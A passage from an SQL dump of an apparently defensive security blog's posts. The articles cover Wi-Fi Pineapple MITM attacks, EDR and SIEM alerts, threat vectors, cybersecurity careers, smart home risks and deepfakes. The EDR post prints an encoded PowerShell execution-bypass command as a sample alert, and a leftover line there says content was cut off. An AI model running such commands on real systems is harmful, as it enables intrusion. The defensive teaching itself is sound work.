cybersecurity approach.', 'Cybersecurity Balance'),
(9, 'Wi-Fi Pineapple: A Comprehensive Guide to Network Security and Threat Prevention', 'wi-fi-pineapple-a-comprehensive-guide-to-network-security-and-threat-prevention', '# Understanding Wi-Fi Pineapple: A Cybersecurity Perspective\n\nWhen you hear the term \"Wi-Fi Pineapple,\" you might picture a tropical fruit connected to your network. However, in the cybersecurity world, this device is far from sweet. Wi-Fi Pineapples are powerful tools designed for network auditing, but in the wrong hands, they can be used for malicious purposes.\n\nThis blog will break down what a Wi-Fi Pineapple is, how it works (with a focus on MITM attacks), real-world scenarios where these devices have been exploited, and effective security measures to protect yourself. By the end, you\'ll have a deeper understanding of this tool and how to stay one step ahead of potential attackers.\n\n## What Is a Wi-Fi Pineapple?\n\nA Wi-Fi Pineapple is a device created by Hak5, a company known for its ethical hacking training tools. Originally built to assist network administrators and penetration testers, the Pineapple allows users to monitor, analyze, and test wireless networks.\n\nEssentially, it acts as a device that can simulate rogue Wi-Fi networks and mimic legitimate access points (APs). It can capture data, intercept information, and probe vulnerabilities in a network’s security framework. While its ethical use is significant in network auditing and cybersecurity testing, these devices can also be exploited by hackers for nefarious purposes.\n\n## How Wi-Fi Pineapple Works: Man-in-the-Middle (MITM) Attacks Explained\n\nOne of the most dangerous features of the Wi-Fi Pineapple is its ability to facilitate a **man-in-the-middle (MITM) attack** seamlessly. Here’s how it works:\n\n### Step 1: Mimicking Legitimate Wi-Fi Networks\n\nWi-Fi Pineapples scan the area for Wi-Fi AP names and automatically respond to connection requests. Many unsuspecting devices, such as laptops and smartphones, are programmed to automatically reconnect to familiar Wi-Fi names (e.g., \"Starbucks_Free_WiFi\"). The Pineapple responds as the “strongest” signal impersonating that AP.\n\n### Step 2: Capturing Data\n\nWhen a victim connects to the Pineapple, their internet traffic can be intercepted. Attackers can collect sensitive data such as login credentials, session cookies, and even browsing activity.\n\n### Step 3: Deploying Attacks\n\nDuring MITM attacks, bad actors can:\n\n- Redirect users to malicious websites to steal information.\n- Inject malware into HTTP traffic.\n- Uncover intricate details of unencrypted connections.\n\nThe result? Your personal and professional data is captured without your knowledge, and in unsecured networks, this risk skyrockets.\n\n## Different Wi-Fi Pineapple Models and Their Features\n\nHak5 currently offers several models of Wi-Fi Pineapple devices, catering to both beginner and advanced users. Below are the most popular models:\n\n### 1. Wi-Fi Pineapple Nano\n\n- Portable yet powerful\n- Best for on-the-go network assessments\n- Budget-friendly, making it accessible to beginners\n\n### 2. Wi-Fi Pineapple Tetra\n\n- Dual radio capabilities\n- Handles multiple wireless clients simultaneously\n- Perfect for advanced penetration testing setups\n\n### 3. Enterprise Solutions\n\n- High-level auditing programs customized for corporate needs\n- More security and control for ethical usage\n\nEach model includes rich features like packet sniffing, victim profiling, and additional plugins to enhance adaptability. However, these tools also make them dangerous if exploited.\n\n## Real-World Scenarios of Pineapple Attacks\n\nWi-Fi Pineapples pose significant threats to any environment where Wi-Fi is accessible. Here are real-world examples to illustrate how they’ve been used:\n\n### 1. Coffee Shop Surveillance\n\nA cybercriminal sits in a coffee shop with their Wi-Fi Pineapple. As customers connect to what they believe is the café\'s free Wi-Fi, the attacker intercepts login credentials for banking apps and social media platforms.\n\n### 2. Corporate Espionage\n\nAttackers impersonate a secure office network, tricking employees into connecting to their rogue AP. This enables the attacker to exfiltrate sensitive corporate data.\n\n### 3. Conference Exploits\n\nLarge public events such as tech conferences present easy targets. Attendees connect to what they think is the event Wi-Fi. Hackers use Pineapples to inject malicious programs or monitor unencrypted emails.\n\nThese examples indicate how a seemingly innocuous device can disrupt personal security and corporate networks alike.\n\n## Best Practices for Protection: Security Measures and Tools\n\nFortunately, you can protect yourself and your organization from Wi-Fi Pineapple-enabled attacks. Implement the following best practices:\n\n### 1. Avoid Public Wi-Fi Whenever Possible\n\nPublic networks lack security and make you vulnerable to rogue APs. Use your mobile hotspot or a known secure network instead.\n\n### 2. Use a VPN\n\nA Virtual Private Network (VPN) encrypts your internet traffic. Even if an attacker intercepts it, they won’t be able to decipher sensitive data.\n\n### 3. Beware of Rogue APs\n\nTurn off auto-connect to networks in your device’s settings. Manually verify the legitimacy of Wi-Fi networks before connecting.\n\n### 4. Enable HTTPS\n\nEnsure that every website you visit uses HTTPS encryption. Tools like HTTPS Everywhere (a browser extension) enforce this, creating a secure connection.\n\n### 5. Add Strong Endpoint Protection\n\nInstall antivirus and antimalware programs across your devices. Many endpoint security tools alert you to suspicious activity initiated by MITM tactics.\n\n### 6. Educate Employees\n\nFor businesses, invest in cybersecurity awareness training. Equip employees to recognize phishing schemes and rogue AP strategies.\n\n### 7. Use MAC Address Filtering\n\nOn sensitive networks, permit access only to known devices using MAC address filtering. While not foolproof, it’s another layer of security.\n\nBy following these tactics, individuals and companies can significantly reduce vulnerabilities.\n\n## The Future of Wi-Fi Security and Pineapple Devices\n\nWhile devices like the Wi-Fi Pineapple are unlikely to disappear anytime soon, advancements in network security continue to evolve:\n\n- **Wi-Fi 6 Encryption**: New standards, such as WPA3 in Wi-Fi 6, aim to improve encryption and prevent data sniffing.\n- **AI-Driven Security**: Automated threat detection using artificial intelligence can monitor network traffic in real-time for suspicious activities.\n\nThese advancements promise a more secure future in the face of evolving threats.', '', 'http://infoseclabs.io/uploads/1767499500376-718819269.png', NULL, 1, 'published', '2026-01-06 11:04:00', '2026-01-08 01:43:04', 'Projects', 'Protect Yourself from Wi-Fi Pineapple Attacks', 'Learn how to safeguard against Wi-Fi Pineapple attacks with effective security measures and insights into MITM threats.', 'Wi-Fi Pineapple'),
(10, 'Top EDR Alerts Every Organization Encounters and How to Handle Them', 'top-edr-alerts-every-organization-encounters-and-how-to-handle-them', '# Understanding Endpoint Detection and Response (EDR) Alerts\n\nEndpoint Detection and Response (EDR) is a critical component of modern cybersecurity strategies. With the rise of sophisticated cyber threats targeting endpoints such as laptops, servers, and mobile devices, EDR tools help detect, analyze, and respond to potential risks in real-time. However, managing EDR alerts can often feel overwhelming due to the sheer volume of notifications generated in an enterprise environment.\n\nThis post explores the most common categories of EDR alerts, provides examples of key alerts organizations typically encounter, and shares best practices for analyzing, prioritizing, and responding effectively. Whether you\'re a security analyst working in a SOC or an IT professional overseeing endpoint security, this guide will help you navigate the EDR alert landscape with confidence.\n\n## Why EDR Alerts Matter\n\nWhy are EDR alerts so critical to an organization\'s security posture? Simply put, endpoints are common entry points for attackers. Malicious actors often use techniques such as phishing emails, malware, or compromised credentials to gain access to endpoints before moving laterally across a network.\n\nEDR tools monitor endpoint activities, log suspicious behaviors, and send alerts when potential threats are detected. These alerts highlight risks such as malware infections, unauthorized file access, and anomalous network behavior. Ignoring or mismanaging these alerts could allow attackers to escalate their operations undetected, causing significant damage to your business.\n\n## Common EDR Alert Categories\n\nTo efficiently manage EDR alerts, it’s important to first understand their key categories. These alerts typically fall under the following types:\n\n### Malware Detection\n\nAlerts related to known or suspected malware activity, such as ransomware, trojans, or spyware. These often stem from signature-based detections or anomalous behaviors.\n\n### Suspicious Process Execution\n\nAlerts generated when an unusual or unauthorized process runs on an endpoint. Examples include PowerShell abuse or launching a process from unexpected directories.\n\n### Unusual User Behavior\n\nBehavioral anomalies such as a user accessing sensitive data at unusual hours or failed login attempts from unfamiliar locations often trigger alerts.\n\n### File Integrity Variations\n\nActivities such as unauthorized changes, additions, or deletions of critical system files or registries send file integrity alerts. These can indicate attempts to tamper with systems.\n\n### Network Anomalies\n\nUnusual traffic patterns between endpoints or outbound connections to suspicious external IP addresses result in network-related alerts.\n\n### Privilege Escalation Attempts\n\nAlerts flag actions where a user or process attempts to gain elevated access privileges without authorization.\n\n## Top EDR Alert Examples\n\nLet\'s take a closer look at specific EDR alert examples and their significance in an enterprise security environment.\n\n### Example 1: Ransomware Behavior Detected\n\n- **Alert Description**: Files are being renamed with “.encrypted” extension, indicating potential ransomware activity.\n- **Details**:\n  - Process Name: `encryptor.exe`\n  - Detected Behavior: Mass file encryption in user directories.\n  - Host Machine: `Workstation-22`\n- **Action Required**:\n  - Isolate the endpoint immediately.\n  - Identify the ransomware strain and retrieve backups.\n  - Perform a root-cause analysis to prevent recurrence.\n\n### Example 2: PowerShell Command-Line Anomaly\n\n- **Alert Description**: Unusual PowerShell script execution detected on server.\n- **Details**:\n  - Command Line Argument: `powershell -exec bypass -enc [Base64 encoded payload]`\n  - User Account: `admin_temp`\n  - Timestamp: `2024-03-14 11:23 PM`\n- **Action Required**:\n  - Investigate execution context and user activity.\n  - Reverse engineer the encoded payload to detect malicious intent.\n\n### Example 3: Unauthorized Administrator Access\n\n- **Alert Description**: A non-admin user attempted to access privileged directories.\n- **Details**:\n  - Affected Directory: `/etc/shadow`\n  - Failed Logins Detected: 5 attempts\n  - Source IP Address: `192.168.1.45`\n- **Action Required**:\n  - Lock the user\'s account temporarily.\n  - Analyze source IP activity for brute-force attack patterns.\n\n### Example 4: Outbound Connection to Known Malicious IP\n\n- **Alert Description**: Host attempted to contact a blacklisted external IP address.\n- **Details**:\n  - (Further details would be provided here, but they were cut off in the original content.)\n\nUnderstanding these alerts and their implications can significantly enhance an organization\'s ability to protect its network infrastructure. Properly responding to EDR alerts ensures that potential threats are mitigated swiftly, reducing the risk of significant breaches.', '', 'http://infoseclabs.io/uploads/1767499662544-499873320.png', NULL, 1, 'published', '2026-01-10 03:06:00', '2026-01-13 01:09:10', NULL, 'Top EDR Alerts & Solutions for Organizations', 'Discover common EDR alerts and learn effective strategies to manage and respond to them, ensuring robust endpoint security.', 'EDR Alerts');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(11, 'Mastering SIEM Alerts: A Guide to Effective Management and Optimization', 'mastering-siem-alerts-a-guide-to-effective-management-and-optimization', '# Understanding and Managing SIEM Alerts\n\nSecurity Information and Event Management (SIEM) systems are foundational tools in modern cybersecurity. They provide critical insights into an organization\'s environment by collecting, analyzing, and prioritizing data from various sources. However, one of the main challenges for security analysts and Security Operations Center (SOC) teams is managing the sheer volume of alerts generated daily.\n\nThis post explores the most common SIEM alerts organizations encounter, including examples of critical alerts and how to prioritize, manage, and optimize your SIEM system effectively.\n\n## What Are SIEM Alerts and Why Are They Important?\n\nSIEM alerts are notifications generated by a SIEM system when it detects activity that matches preconfigured rules or anomalies in the monitored environment. These alerts help security teams address potential threats swiftly, thereby minimizing risks to the organization.\n\n### Why SIEM Alerts Matter\n\n- **Real-Time Threat Detection**: Alerts identify security incidents like network intrusions or unauthorized access as they occur.\n- **Less Downtime**: Early warning systems reduce the time to resolve critical vulnerabilities.\n- **Compliance**: SIEM tools help organizations meet regulatory requirements by providing detailed logging and reporting.\n\nWithout proper alert management, these tools can easily overwhelm teams with noise, making it challenging to differentiate true cyber threats from false positives.\n\n## Common Types of SIEM Alerts Organizations Receive\n\nSIEM systems can monitor a wide range of events, but certain types of alerts are more prevalent across organizations. Below are some categories that security analysts commonly encounter:\n\n### 1. Failed Login Attempts\n\n- **Why It Happens**: A user attempts to log in multiple times with incorrect credentials.\n- **Risk**: This often indicates a brute-force attack or an insider threat attempting unauthorized access.\n- **Example**: Multiple failed logins across different accounts within a short time frame.\n\n### 2. Unusual User Behavior\n\n- **Why It Happens**: A user deviates from their normal login patterns (e.g., accessing resources at odd hours).\n- **Risk**: A compromised account or insider threat.\n- **Example**: An employee who typically works in New York is suddenly logging in from an IP address in Eastern Europe at 3 AM.\n\n### 3. Malware Detection\n\n- **Why It Happens**: Malware signatures are detected on a workstation or server.\n- **Risk**: The malware could spread laterally across networks and exfiltrate data.\n- **Example**: A SIEM tool picks up logs from your antivirus software indicating the presence of files matching known ransomware hashes.\n\n### 4. Privilege Escalation Attempts\n\n- **Why It Happens**: Users or processes attempt to gain administrative privileges.\n- **Risk**: Privilege escalation is often an early step in more complex attacks like ransomware.\n- **Example**: A standard user suddenly tries to execute administrative commands without prior approval.\n\n### 5. Data Exfiltration\n\n- **Why It Happens**: Large volumes of sensitive data are transferred outside the organization’s internal network.\n- **Risk**: A clear sign of insider threats or external breaches.\n- **Example**: A file server sending gigabytes of data to an unknown external IP over a short duration.\n\n### 6. Unauthorized Access to Critical Systems\n\n- **Why It Happens**: Access attempts to systems housing sensitive data outside of permissible roles or hours.\n- **Risk**: A sign of malicious insider activity or an attacker leveraging stolen credentials.\n- **Example**: A user account attempts to access a database server containing financial records without prior authorization.\n\n### 7. Denial-of-Service (DoS) Attack Indicators\n\n- **Why It Happens**: A spike in network traffic results in a server becoming unresponsive.\n- **Risk**: Disruption of operations, affecting customer experience and internal workflows.\n- **Example**: Your SIEM correlates logs pointing to unusually high traffic originating from multiple IP addresses targeting a single web server.\n\n### 8. Suspicious File Modifications\n\n- **Why It Happens**: Critical system files are unexpectedly modified.\n- **Risk**: Could indicate ransomware encrypting files or malware embedding payloads.\n- **Example**: Unauthorized changes to key registry settings or .bat and .dll files.\n\nEach of these alerts represents distinct threats that require prompt investigation and action. However, not all alerts are created equal, and some demand more immediate attention than others.\n\n## How to Effectively Manage and Prioritize SIEM Alerts\n\nManaging SIEM alerts is like trying to sip from a firehose; you need a strategy to get the good out of it without being drowned by excessive information. Here’s how you can effectively manage and prioritize alerts:\n\n1. **Categorize Alerts by Severity**\n   - Divide alerts into categories such as critical, high, medium, and low based on the level of potential risk.\n   - For example, failed login attempts might be \"low priority\" unless they are widespread, while detected ransomware is \"critical.\"\n\nBy understanding and categorizing alerts effectively, security teams can focus on the most significant threats and ensure timely responses to protect their organizations.', '', 'http://infoseclabs.io/uploads/1767501764296-302552087.png', NULL, 1, 'published', '2026-01-06 07:43:00', '2026-01-06 16:10:10', 'Information Security', 'Top SIEM Alerts Organizations Face', 'Discover common SIEM alerts, their impact, and strategies to manage them effectively for enhanced cybersecurity.', 'SIEM alerts'),
(12, 'How Cyber Threats Infiltrate: Insight into Digital Security Risks', 'how-cyber-threats-infiltrate-insight-into-digital-security-risks', '# Navigating the Digital Threat Landscape\n\nThe digital world is buzzing with activity. Everywhere we go, invisible connections through Wi-Fi, Bluetooth, and other technologies surround us. However, lurking within that mix are sneaky cyber threats waiting for an opportunity to strike. Understanding how hackers exploit vulnerabilities in our digital lives is key to staying ahead of them.\n\nThis blog dives into common threat vectors and attack surfaces, breaking down how cyber threats operate and, more importantly, how you can protect yourself.\n\n## The Sneaky World of Threat Vectors\n\n### Messages as a Gateway\n\nMessages might seem harmless, but they can open doors for hackers. Emails, for example, are one of the oldest and most common ways attackers exploit our trust in digital communication.\n\n- **Phishing** works by tricking users into clicking malicious links or sharing sensitive information, often by imitating trusted sources like banks or tax authorities.\n- **Smishing** is the SMS version of phishing, where attackers send texts posing as delivery companies or other trusted entities, aiming to con you into revealing private details or downloading malware.\n- Even **instant messaging apps** with better security measures like end-to-end encryption aren\'t immune. Hackers may use infected files or social engineering tactics to compromise users.\n\n### Images Aren’t Always Innocent\n\nThink that image file is harmless? Think again. Hackers embed malicious code into image files, turning them into digital Trojan horses. Once opened, these files can trigger harmful actions like releasing ransomware or stealing your data.\n\n### Files Are Dangerous When Tampered With\n\nEvery file exchanged online, from documents to spreadsheets, could potentially carry malicious software. When you open an infected file, attackers can exploit weaknesses in your device to steal data, take over your system, or launch other forms of attack.\n\n### Voice Calls Can Be a Threat\n\nPhones haven\'t escaped the reach of cybercriminals. **Vishing** (voice phishing) tricks unsuspecting individuals by using caller ID spoofing to look like legitimate entities, such as your bank. Through convincing conversations, attackers aim to extract sensitive details like passwords or financial data.\n\n### Your USB Could Be a Trap\n\nUSB drives might seem innocuous, but they can act as digital landmines. Plugging in a tampered USB stick can spread malware to your system. Sometimes, hackers leave infected drives in public places, counting on curiosity to do the rest.\n\n## Vulnerable Software: An Open Invitation for Hackers\n\nOld or unpatched software is like having holes in the walls of your digital fortress. Vulnerabilities in software—from coding errors to outdated versions without security updates—can be exploited, enabling attackers to breach systems and steal sensitive data.\n\nOrganizations must regularly manage updates and patches to seal these vulnerabilities. Tools like **vulnerability scanners** proactively identify and address these gaps before hackers can exploit them.\n\n### Agent-Based vs. Agentless Scanning\n\n- **Agent-Based Scanning** installs software on devices to detect vulnerabilities and report them back to a central server.\n- **Agentless Scanning** requires no software installation but uses tools like Nmap and Wireshark to remotely scan systems.\n\nHackers often favor agentless methods for reconnaissance since they leave no traces, underscoring the need for organizations to scan their systems first.\n\n## Key Takeaways to Stay Secure\n\nUnderstanding how hackers exploit vulnerabilities allows you to stay vigilant and build strong defenses. Here are some tips to protect yourself online:\n\n- Always verify messages before clicking links or sharing information.\n- Use security software to detect hidden malicious code in files and images.\n- Keep all software up-to-date to patch vulnerabilities.\n- Never plug in USB drives you find in public places.\n- Be cautious of phone calls from unverified sources, even if they appear familiar.\n\nCybercriminals are constantly evolving their tactics, but with proactive measures, you can safeguard your digital life from their threats.', '', 'http://infoseclabs.io/uploads/1767560795113-590336718.png', NULL, 1, 'published', '2026-01-04 16:06:00', '2026-01-05 00:07:33', 'Information Security', 'How Cyber Threats Infiltrate Digital Security', 'Explore how cyber threats operate and learn strategies to protect yourself from digital security risks.', 'Cyber Threats'),
(13, 'Breaking Into Cybersecurity: A Realistic Guide for Aspiring Professionals', 'breaking-into-cybersecurity-a-realistic-guide-for-aspiring-professionals', '# Breaking into Cybersecurity: A Realistic Guide\n\nEntering the field of cybersecurity is one of the most exciting career paths in technology, but it’s not without its challenges. Many aspiring professionals start with the misconception that simply studying cybersecurity concepts, watching tutorials, or earning certificates will guarantee them a high-paying job in just a few months. While some may stumble upon opportunities, for most, the reality is far more demanding. This blog post will break down the common missteps and guide you on how to effectively pave your way into the cybersecurity world.\n\n## The Problem with \"Study-Only\" Approaches\n\nOne of the biggest mistakes beginners make is focusing solely on learning concepts from college courses, books, or tutorials without applying them. Memorizing cybersecurity principles may give you a theoretical understanding, but it doesn’t equate to the hands-on experience that employers are looking for.\n\nThis phenomenon can leave you in what’s called \"learning purgatory.\" You might know all the right terminology and theories, but you’ll stumble when it’s time to apply your knowledge in a real-world scenario.\n\n**Reality check:** To stand out in interviews and secure your first cybersecurity role, you must demonstrate practical, hands-on experience. Employers want to see proof that you can not only explain cybersecurity concepts but also implement and troubleshoot them in real scenarios.\n\n## The Misleading Perception of \"Easy Tech Jobs\"\n\nWe\'ve all seen videos that glamorize tech jobs, making it seem like professionals spend their days sipping coffee, playing video games, and working out between 10-minute meetings. While entertaining, these portrayals create a false perception that tech jobs, including cybersecurity, are effortless to attain and maintain.\n\nTrue cybersecurity work involves rolling up your sleeves and getting your hands dirty with problem-solving, configuring systems, and handling unexpected errors. The path to landing a well-paying cybersecurity role is challenging and requires resilience, patience, and consistent effort.\n\n## Two Big Challenges to Overcome\n\nAnyone aspiring to break into cybersecurity faces two major hurdles:\n\n1. **Landing interviews.**\n2. **Securing the actual job after interviews.**\n\nThese are two entirely different challenges, each requiring a tailored approach. For interviews, you need to showcase a blend of knowledge and practical expertise. For the role itself, you must demonstrate your readiness to tackle real-world cybersecurity challenges.\n\n## How to Learn Cybersecurity the Right Way\n\nHere’s what sets successful cybersecurity professionals apart from those stuck in \"learning purgatory\":\n\n### 1. Focus on Practical, Hands-On Experience\n\nLearning about concepts like reverse shells is good. However, the true value lies in implementing these concepts:\n\n- Set up a lab environment at home with a server and endpoints.\n- Simulate real attacks and defense mechanisms, such as detecting reverse shells.\n- Deploy tools like a SIEM (Security Information and Event Management system) to learn how to monitor and defend against threats.\n\nThe more you work hands-on, the more these experiences will become ingrained, making them easier to recall during an interview or on the job.\n\n### 2. Start Small and Build Gradually\n\nYou don’t need to master complex tools like a SIEM or curate detection rules for your first entry-level cybersecurity job. Start small:\n\n- Learn the fundamentals of networking and cybersecurity basics.\n- Apply what you learn with simple projects, like setting up a basic firewall or analyzing traffic logs.\n- Gradually take on more challenging projects as your skills improve.\n\n### 3. Learn Through Troubleshooting\n\nMistakes are where the real learning happens. When setting up tools or environments, you’ll inevitably encounter errors. Instead of getting frustrated, use these moments to learn:\n\n- Debugging errors will teach you valuable lessons about system interaction.\n- Documentation and reading forums like Stack Overflow will become second nature.\n\n### 4. Understand the Value of Repetition\n\nRepetition is vital for mastering cybersecurity skills. If you’re learning about reverse shells, practice setting them up repeatedly until you could do it in your sleep. This kind of muscle memory will help you stand out in interviews and on the job.\n\n### 5. Utilize Learning Platforms\n\nToday, you have access to an abundance of affordable and comprehensive learning platforms:\n\n- **TryHackMe**\n- **Hack The Box**\n- **Key cyber labs**\n\nUse these platforms to perform practical exercises, submit findings, and gain experience in simulated environments.\n\n### 6. Be Persistent\n\nBreaking into cybersecurity takes more time and effort than many expect. Prepare to apply for numerous jobs, undergo multiple interview rounds, and continually build your skills. Persistence is key.\n\n## Hands-On Cybersecurity Examples\n\nTo put this into perspective, here’s a practical project you can work on:\n\n- **Reverse Shells:** Learn how attackers use reverse shells to execute code remotely.\n  - Set up an attack server and a victim machine.\n  - Simulate a reverse shell attack in your lab.\n  - Create detection rules for the reverse shell in your SIEM and test their effectiveness.\n\nThis project, while challenging, will give you unparalleled insights into how attacks work and what defenders need to do to stop them. Projects like these also provide valuable talking points for interviews.\n\n## The Importance of Realistic Expectations\n\nIt’s important to acknowledge that cybersecurity is not an easy field to break into, but it’s far from impossible. It requires:\n\n- Time\n- Consistent effort\n- Real-world, hands-on experience\n\nThere’s no shortcut or three-month boot camp that will magically land you a six-figure cybersecurity role. The candidates who stand out are the ones who actively apply what they learn, build on their skills, and remain patient in their job search.\n\n## Final Words of Advice\n\nIf you’re serious about a career in cybersecurity, here’s your priority list:\n\n1. Stop consuming endless videos and focus on practical work.\n2. Build projects, test exploits, and document your findings.\n3. Apply for jobs with a portfolio that demonstrates your skills.\n4. Be resilient, patient, and committed to learning.', '', 'http://infoseclabs.io/uploads/1767564505851-906926040.jpg', 'Aspiring cybersecurity professional learning from practical experience', 1, 'published', '2026-01-04 17:08:00', '2026-01-05 01:08:41', 'Information Security', 'Guide: Break into Cybersecurity Successfully', 'Discover realistic steps to enter cybersecurity, overcome challenges, and gain practical experience.', 'Cybersecurity career'),
(14, 'The Rise of Smart Homes: Convenience Meets Security Concerns', 'the-rise-of-smart-homes-convenience-meets-security-concerns', '# The Reality of Smart Home Security\n\nSmart homes are no longer a futuristic dream; they are now a part of everyday life. From smart thermostats and security cameras to voice assistants and lights you can control with your phone, the Internet of Things (IoT) has redefined how we live. It allows us to experience unprecedented convenience, energy efficiency, and connectivity within our homes.\n\nBut with this new convenience comes a growing question that tech enthusiasts and security-conscious consumers alike are grappling with: **Are smart homes truly safe?** IoT devices, while innovative, have inherent vulnerabilities that can expose your personal life to hackers and cybercriminals.\n\nThis post dives into the often-overlooked risks of IoT security, real-world examples of breaches, expert insights, and actionable steps to keep your smart home safe. By the end, you will have a clear understanding of the challenges and proactive measures needed to make your smart home smarter _and_ safer.\n\n## Understanding IoT Security Risks\n\nIoT devices, at their core, are compact computers linked through networks. These devices communicate data across the web, enabling seamless smart home automation. However, this connectivity is also their Achilles\' heel, making IoT devices prime targets for cyberattacks.\n\nHere are the most common vulnerabilities you should know about:\n\n### 1. Weak Passwords\n\nMany IoT devices come with factory-set passwords that are either easy to guess (e.g., \"admin\" or \"password123\") or shared across multiple devices. If left unchanged, these passwords act as an open invitation for hackers.\n\n### 2. Unencrypted Communication\n\nNot all IoT devices encrypt their data during transmission. This means sensitive information, like login credentials or video footage, could be intercepted by skilled attackers when communicated over networks.\n\n### 3. Lack of Software Updates\n\nIoT manufacturers often rush devices to market without a robust plan for updates. Without regular software patches, these devices remain vulnerable to emerging threats. A 2020 survey by Symantec showed that over 60% of IoT devices run outdated or insecure firmware.\n\n### 4. Universal Plug and Play (UPnP)\n\nWhile UPnP facilitates device interconnectivity, it can make devices visible to the internet, leaving them susceptible to unauthorized access. Think of it as leaving your front door unintentionally unlocked.\n\n### 5. Network Weaknesses\n\nIoT devices often operate over shared home networks. When attackers gain unauthorized access to one device, they can quickly move laterally into other connected devices, creating a domino effect.\n\n## Real-World Examples\n\nHistory has shown that these vulnerabilities are not just theoretical concerns; they\'ve been exploited in real and alarming ways.\n\n### 1. The Mirai Botnet Attack\n\nThe 2016 Mirai botnet infected insecure IoT devices like security cameras and baby monitors, assembling them into a massive botnet that launched one of the largest distributed denial-of-service (DDoS) attacks in history. It disrupted major websites like Twitter, Netflix, and PayPal.\n\n### 2. Hacking Smart Thermostats\n\nHackers have demonstrated their ability to take control of smart thermostats, as was publicly shown at the DEF CON cybersecurity conference in 2018. A compromised thermostat could not only disrupt comfort but even result in extreme energy costs.\n\n### 3. Unauthorized Surveillance\n\nSeveral cases have emerged where hackers gained access to smart home security cameras, spying on unsuspecting users. Perhaps one of the most harrowing incidents involved attackers who lashed out verbally at homeowners through hacked smart cameras like those by Ring.\n\n### 4. Stolen Data Logs\n\nVoice assistants that capture recordings of your conversations have been hacked, leading to unauthorized access to sensitive personal data. The Telesploit attack, for instance, proved that attackers could easily exploit Amazon Echo setups using Wi-Fi vulnerabilities.\n\nThese examples highlight the potential for IoT misuse, turning \"convenience\" into a threat.\n\n## Expert Opinions on IoT Security\n\nTo unpack the issue, we asked cybersecurity professionals for their insights on IoT safety. Here\'s what they had to say.\n\n### Dr. Emily Crane, Cybersecurity Researcher\n\n_\"IoT devices are often built faster than they\'re secured. Developers should design security into the software, but users also play a critical role by configuring their devices properly and updating them regularly.\"_\n\n### Mike Liu, Ethical Hacker\n\n_\"Most attacks are preventable with basic measures like strong passwords and segregated networks. However, we can\'t ignore the manufacturer\'s responsibility to ensure devices come with better encryption protocols and auto-update features.\"_\n\n### Jennifer Alvarez, Head of IoT Security at SecureShield\n\n_\"The IoT revolution is exciting but comes with an inherent trade-off between convenience and security. The only question is whether users and manufacturers will take the necessary steps to minimize risk before it\'s too late.\"_\n\n## Practical Security Measures\n\nThe good news is that securing your smart home is entirely attainable with the right steps. Here’s a practical checklist to make your IoT setup safer.\n\n### 1. Change Default Passwords\n\nImmediately replace factory-set passwords with strong, unique ones. A mix of uppercase letters, numbers, and special characters is ideal.\n\n### 2. Enable Two-Factor Authentication (2FA)\n\nWhenever possible, enable 2FA for an additional layer of protection beyond your password.\n\n### 3. Keep Your Firmware Updated\n\nRegularly check for and install updates on all IoT devices. If your device lacks update support, consider replacing it with one that does.\n\n### 4. Use a Separate Network for IoT Devices\n\nCreate a guest Wi-Fi network exclusively for your smart devices. Separating them from your primary network could limit exposure if one device gets hacked.\n\n### 5. Disable Unnecessary Features\n\nTurn off features like Universal Plug and Play (UPnP) unless absolutely necessary.\n\n### 6. Encrypt Your Network and Devices\n\nEnsure your Wi-Fi network is encrypted using WPA3 (or at least WPA2) protocols. Additionally, enable encryption on any device that allows it.\n\n## The Future of IoT Security\n\nIoT security is evolving, making it both exciting and daunting. Here’s what the future holds for the industry.\n\n### 1. AI-Driven Security\n\nArtificial intelligence is being integrated into IoT devices to detect and mitigate threats automatically. Smart threat detection services powered by AI algorithms could revolutionize end-user security.\n\n### 2. Standardization Efforts\n\nRegulators are stepping in to push for standard IoT security frameworks, ensuring comprehensive protections for consumers.\n\n### 3. Blockchain for IoT\n\nBlockchain technology may offer decentralized, tamper-proof security for IoT devices, reducing vulnerabilities in data transmission.\n\n### 4. 5G and Beyond\n\nWhile 5G speeds will supercharge IoT functionality, they will also open the gates for more complex cyberattacks. IoT security will need to evolve in tandem with connectivity upgrades.', '', 'http://infoseclabs.io/uploads/1767565053972-660878437.jpg', 'A modern smart home setup with connected IoT devices', 1, 'published', '2026-01-04 01:09:00', '2026-01-05 01:17:36', 'Information Security', 'Smart Homes: Convenience vs. Security Risks', 'Explore smart home security challenges and learn steps to protect your IoT devices from cyber threats.', 'Smart Home Security'),
(15, 'Deepfakes and Cybersecurity Risks: What You Need to Know', 'deepfakes-and-cybersecurity-risks-what-you-need-to-know', '# The Growing Threat of Deepfakes in Cybersecurity\n\nWith AI rapidly evolving, deepfakes have transformed from simple internet curiosities into significant cybersecurity threats. Their ability to forge realistic audio and video content puts individuals, organizations, and even governments at risk. But how do these AI-generated movies of deception actually work, what dangers do they pose, and most importantly, how can we fight back?\n\nThis article explores the intersection of deepfakes and cybersecurity, real-world examples of attacks, how they bypass security systems, and the tools and strategies experts recommend to detect and prevent them.\n\n## What Are Deepfakes?\n\nDeepfakes are AI-generated media that convincingly mimic real people\'s voices, faces, or behaviors. Created using **deep learning algorithms** like _generative adversarial networks (GANs)_, these forgeries can produce fake videos, audio, and even live streams that are almost indistinguishable from authentic recordings.\n\nFor instance, imagine a video where a high-profile CEO appears to announce false financial data, or a phone call where the \"voice\" of your manager requests an urgent wire transfer. These aren\'t hypothetical anymore; such deepfake attacks are happening now.\n\nWhile deepfakes can be used creatively—for entertainment, art, and training simulations—they pose significant risks when exploited maliciously.\n\n## Deepfakes and Cybersecurity: Understanding the Risks\n\nDeepfakes are no longer just tools for pranks or misinformation; they’re now a weapon in the arsenal of cybercriminals. Here’s why they’re such a growing concern in cybersecurity:\n\n### 1. Identity Fraud and Personal Risks\n\nDeepfakes can be used to impersonate individuals for phishing scams, such as creating fabricated videos of someone requesting sensitive corporate data. Worse, personal embarrassment and reputational harm caused by fake videos have been weaponized in cases like political defamation or revenge porn.\n\n### 2. Corporate Espionage\n\nCybercriminals can use deepfakes to impersonate executives or employees in video conferences to steal business secrets, authorize financial actions, or manipulate decisions.\n\n### 3. Disinformation Campaigns\n\nDeepfakes can influence public opinion by spreading disinformation during elections, protests, or corporate crises. This magnifies their potential as a tool for political or social manipulation.\n\n### 4. Eroding Trust\n\nWith deepfake technology becoming more sophisticated, it’s harder to distinguish truth from fiction. This \"truth decay\" affects trust in communications, digital evidence, and even democracy.\n\n## Real-World Examples of Deepfake Cyberattacks\n\nUnderstanding how deepfakes are exploited in real scenarios helps us better 